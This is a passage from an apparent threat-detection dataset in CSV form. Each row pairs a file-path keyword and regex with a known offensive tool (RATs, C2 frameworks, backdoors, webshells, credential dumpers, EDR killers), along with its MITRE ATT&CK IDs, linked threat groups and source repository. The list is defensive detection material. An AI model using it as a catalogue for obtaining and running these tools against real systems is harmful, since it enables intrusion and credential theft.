"*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5521"
"*/Babylon RAT.exe*",".{0,1000}\/Babylon\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5522"
"*/BabyShark.git*",".{0,1000}\/BabyShark\.git.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","5523"
"*/BackDoor*",".{0,1000}\/BackDoor.{0,1000}","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5524"
"*/backdoor.bat*",".{0,1000}\/backdoor\.bat.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","5525"
"*/backdoor.exe*",".{0,1000}\/backdoor\.exe.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","5526"
"*/Backdoor.PHP.Agent.php*",".{0,1000}\/Backdoor\.PHP\.Agent\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5527"
"*/backdoor.py*",".{0,1000}\/backdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","5528"
"*/backdoor_all_users.py*",".{0,1000}\/backdoor_all_users\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","5529"
"*/backdoor_apk*",".{0,1000}\/backdoor_apk.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Screetsec/TheFatRat","1","0","#linux","N/A","N/A","10","9941","2324","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z","5530"
"*/backdoored-script.ps1*",".{0,1000}\/backdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","5531"
"*/BackgroundShell.exe*",".{0,1000}\/BackgroundShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","5532"
"*/BackHAck.git*",".{0,1000}\/BackHAck\.git.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","5533"
"*/backhack.py*",".{0,1000}\/backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","5534"
"*/backoff.profile*",".{0,1000}\/backoff\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5535"
"*/backorifice-brute.nse*",".{0,1000}\/backorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5536"
"*/backorifice-info.nse*",".{0,1000}\/backorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5537"
"*/Backstab.git",".{0,1000}\/Backstab\.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5538"
"*/Backstab/Backstab*",".{0,1000}\/Backstab\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5539"
"*/backstab_src/*",".{0,1000}\/backstab_src\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","5540"
"*/Backstab64.exe*",".{0,1000}\/Backstab64\.exe.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","5541"
"*/backupcreds.exe*",".{0,1000}\/backupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","5542"
"*/BackupCreds.git*",".{0,1000}\/BackupCreds\.git.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","1","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","5543"
"*/BackupOperatorToDA.git*",".{0,1000}\/BackupOperatorToDA\.git.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","5544"
"*/BackupPrivSam/*",".{0,1000}\/BackupPrivSam\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","N/A","10","10","164","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z","5545"
"*/bacnet-info.nse*",".{0,1000}\/bacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5546"
"*/bad-3-corrupt_lzma2.xz | tr *",".{0,1000}\/bad\-3\-corrupt_lzma2\.xz\s\|\str\s.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","5547"
"*/badcert.pem*",".{0,1000}\/badcert\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","5548"
"*/badkey.pem*",".{0,1000}\/badkey\.pem.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","5549"
"*/BadPotato.dll*",".{0,1000}\/BadPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","5550"
"*/BadPotato.exe*",".{0,1000}\/BadPotato\.exe.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","5551"
"*/BadPotato.git*",".{0,1000}\/BadPotato\.git.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","5552"
"*/BadRat 1.6/client.exe*",".{0,1000}\/BadRat\s1\.6\/client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5553"
"*/badrat.ps1*",".{0,1000}\/badrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5554"
"*/badrat_cs.exe*",".{0,1000}\/badrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5555"
"*/badrat_server.py*",".{0,1000}\/badrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5556"
"*/badrats.git*",".{0,1000}\/badrats\.git.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","5557"
"*/BadRentdrv2.git*",".{0,1000}\/BadRentdrv2\.git.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","5558"
"*/BadWindowsService.exe*",".{0,1000}\/BadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","5559"
"*/BadWindowsService.git*",".{0,1000}\/BadWindowsService\.git.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","5560"
"*/BadZure.git*",".{0,1000}\/BadZure\.git.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","5561"
"*/BadZure/*",".{0,1000}\/BadZure\/.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","5562"
"*/banner.nse*",".{0,1000}\/banner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5563"
"*/Base64ToBin.py*",".{0,1000}\/Base64ToBin\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","5564"
"*/BaseNEncoder.cs*",".{0,1000}\/BaseNEncoder\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","5565"
"*/bash_completion.d/exegol*",".{0,1000}\/bash_completion\.d\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5566"
"*/bash_executor/*.go",".{0,1000}\/bash_executor\/.{0,1000}\.go","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5567"
"*/bashexplode/boko*",".{0,1000}\/bashexplode\/boko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","#linux","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","5568"
"*/Bashfuscator*",".{0,1000}\/Bashfuscator.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","5569"
"*/bat_b4tm4n.php*",".{0,1000}\/bat_b4tm4n\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5570"
"*/batch_cme_smb.sh*",".{0,1000}\/batch_cme_smb\.sh.{0,1000}","offensive_tool_keyword","crackmapexec","crack mapexec script used by Dispossessor ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor - APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5571"
"*/Bates.csproj*",".{0,1000}\/Bates\.csproj.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","5572"
"*/batik_svg*",".{0,1000}\/batik_svg.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5573"
